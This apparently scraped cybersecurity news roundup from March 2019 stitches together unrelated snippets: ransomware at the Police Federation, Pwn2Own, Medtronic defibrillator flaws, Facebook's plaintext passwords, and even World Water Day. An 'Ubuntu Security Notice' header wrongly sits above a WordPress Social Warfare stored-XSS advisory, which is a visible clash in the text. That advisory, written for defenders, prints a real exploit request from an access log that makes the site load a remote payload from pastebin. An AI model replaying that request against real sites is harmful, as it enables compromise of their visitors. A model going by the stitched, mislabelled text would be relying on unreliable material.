f1tym1

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn how radio frequency technology is putting industrial organizations at risk. Also, understand the threat landscape of telecommunications and how to prepare for future threats.

It has been reported that the Police Federation of England and Wales (PFEW) has confirmed that it has been dealing with a ransomware attack on its computer systems. The PFEW was able to respond quickly to an alert from its cyber-security n Saturday 9th March, with cyber experts rapidly reacting to isolate the malware to stop it from spreading to PFEW branches. 

Fully managed endpoint detection and response solution focusing on behaviors that detect attackers instead of traditional, signature-based detection methods. We provide real time detection and incident management to protect the weakest part of your network.

Written by Joe Warminsky
Mar 22, 2019 | CYBERSCOOP

The first day of this year’s Pwn2Own competition featured successful zero-day exploits on a popular web browser, and day two was no different, with the “Fluoroacetate” duo of Amat Cama and Richard Zhu turning their attention to Mozilla’s Firefox and Microsoft’s Edge.

X-Force Red is an autonomous team of veteran hackers within IBM Security that is hired to break into organizations and uncover risky vulnerabilities that criminal attackers may use for personal gain. Our team recently unveiled new statistics collected from its penetration testing engagements. One statistic that stood out, although not surprisingly, was that out of 1,176 phishing emails sent to employees within five organizations from October 2017 to November 2018, 198 people clicked on the malicious link inside the email and 196 people submitted valid credentials.

Providing enterprise network security is becoming an increasingly complex undertaking, as the number of threats emanating from the Internet continues to grow. Hackers continue to find new ways to attack systems and steal data. Dealing with these threats is highly complex. While numerous reviews like this may indicate that virtual private networks can protect you against all threats, getting on top of enterprise network security is much more difficult.

Further details have emerged about when and how much Facebook knew about data-scraping by the disgraced and now defunct Cambridge Analytica political data firm.

Homeland Security has issued a warning for a set of critical-rated vulnerabilities in Medtronic defibrillators which put the devices at risk of manipulation.

Cyber risks have been a top concern of global leaders for a while now, with cyberattacks appearing four times as a top-five risk by likelihood in the past decade. This year, leaders ranked two technological risks in the top 10 by impact: cyberattacks in seventh place and critical information infrastructure breakdown in eighth place. To combat these global risks, organizations must improve their cyber resilience efforts.

Willie Cade’s grandfather Theo Cade was one of John Deere’s most storied engineers, with 158 patents to his name; he invented the manure spreader and traveled the country investigating stories of how farmers were using, fixing, modifying and upgrading their equipment; today, Willie Cade is the founder of the Electronics Reuse Conference, having spent a quarter-century repairing electronics, diverting e-waste from landfills and rehabilitating it for use by low-income schools and individuals.

Medtronic is the most notorious maker of insecure medical implants in America, with a long history of inserting computers into people’s bodies with insecure wireless interfaces, toolchains and update paths, and nothing has changed.

Perhaps we should all change our Facebook passwords to play it safe, following news that Facebook kept, from as early as 2012, “hundreds of millions” of user account passwords in plain text, making them available to some 20,000 employees, writes KrebsOnSecurity following a tip from a source at Facebook.

Check out the “Ethics, Privacy, and Security” sessions at the Artificial Intelligence Conference in New York, April 15-18, 2019.

World Water Day is a UN initiative celebrated every March 22. It honors water and focuses on those deprived of it. The occasion is a persuasive aide-memoire to the human world to deal with the global water crisis.

In this article, we discuss how the domain name of the services in the Tor network are set and what security risks they may pose. We examine a study from Princeton University concerned with the habits of Tor users in order to determine the potential impacts of security risks.

The latest edition of the ISMG Security Report discusses the recent ransomware attack on aluminum giant, Norsk Hydro. Plus, confessions of a former LulzSec and Anonymous hacker, and the growing problem of cyber extortion.

Secretary of Homeland Security Kirstjen M. Nielsen traveled to Austin, Texas, where she delivered remarks at the International Association of Chiefs of Police (IACP) Midyear meeting between heads of state police agencies, police chief associations, and midsize agencies.

==========================================================================
Ubuntu Security Notice USN-3918-1
March 21, 2019

Exploitation Level: Easy / Remote

DREAD Score: 7.2

Vulnerability: Stored XSS

Patched Version: 3.5.3

A zero-day vulnerability has just appeared in the WordPress plugin world, affecting over 70,000 sites using the Social Warfare plugin.

The plugin is vulnerable to a Stored XSS (Cross-Site Scripting) vulnerability and has been removed from the plugin repository. Attacks can be conducted by any users visiting the site.

A patch has been released and users are advised to update to version 3.5.3 as soon as possible.

What Is It All About?

The vulnerable code is contained within some of the plugins debugging features. These features aren’t directly used anywhere and rely on various $_GET parameters to be executed, which makes it easy to see if your site was attacked using this vulnerability.

A fully working PoC is available in the wild and we expect the number of exploit attempts to grow in size in the coming days.

Indicators of Compromise:

You can look for requests pointing to any PHP file /wp-admin/ with the following parameters in your access logs:

• swp_debug
• swp_url

Exploits in the wild

We are seeing a lot of exploit attempts in the wild from more than a hundred different IPs.

202.254.236.49 - - [21/Mar/2019:16:52:14 -0400] "GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=https://pastebin.com/raw/0yJzqbYf HTTP/1.1" 403 2669 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"

Facebook is facing scrutiny once again today by disclosing that it accidentally stores “hundreds of millions” user passwords in plaintext. To make matters worse, 20,000 Facebook employees had access to view these passwords. Instagram users are also impacted by this massive oversight.